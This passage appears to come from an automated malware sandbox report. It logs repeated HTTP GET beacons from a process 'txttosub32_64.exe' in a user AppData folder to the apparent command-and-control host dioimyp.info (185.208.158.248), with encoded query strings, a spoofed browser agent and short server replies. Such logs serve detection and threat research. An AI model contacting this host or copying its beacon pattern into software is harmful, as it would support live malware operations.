                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Oct 8, 2024 22:39:23.669202089 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:23 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                19192.168.2.449904185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:23.797535896 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:24.514100075 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:24 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                20192.168.2.449910185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:24.641586065 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:25.355410099 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:25 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                21192.168.2.449916185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:25.484618902 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:26.198514938 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:26 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Oct 8, 2024 22:39:26.308355093 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:26.556821108 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:26 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Oct 8, 2024 22:39:26.667088032 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:26.917407990 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:26 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Oct 8, 2024 22:39:27.027499914 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:27.286402941 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:27 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                22192.168.2.449925185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:27.407809019 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:28.104401112 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:28 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Oct 8, 2024 22:39:28.214893103 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:28.460136890 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:28 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                23192.168.2.449934185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:28.579672098 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:29.328043938 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:29 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                24192.168.2.449941185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:29.453476906 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:30.188132048 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:30 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                25192.168.2.449947185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:30.312932968 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:31.031975031 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:30 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                26192.168.2.449953185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:31.157191038 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:31.909291029 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:31 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                27192.168.2.449959185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:32.033193111 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:32.771240950 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:32 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                28192.168.2.449966185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:32.892699957 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:33.600687027 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:33 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Oct 8, 2024 22:39:33.713881016 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:34.189246893 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:33 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Oct 8, 2024 22:39:34.191538095 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:33 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                29192.168.2.449976185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:34.313476086 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:35.050432920 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:34 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                30192.168.2.449982185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:35.178565979 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:35.915008068 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:35 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Oct 8, 2024 22:39:36.025806904 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:36.292777061 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:36 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Oct 8, 2024 22:39:36.401192904 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:36.689039946 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:36 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                31192.168.2.449990185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:36.813271999 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:37.567627907 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:37 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                32192.168.2.449995185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:37.687813997 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:38.404562950 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:38 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                33192.168.2.450002185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:38.531671047 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:39.292177916 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:39 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Oct 8, 2024 22:39:39.400902033 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:39.652472973 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:39 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Oct 8, 2024 22:39:39.760612965 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:40.040637016 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:39 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Oct 8, 2024 22:39:40.151535988 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:40.407454014 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
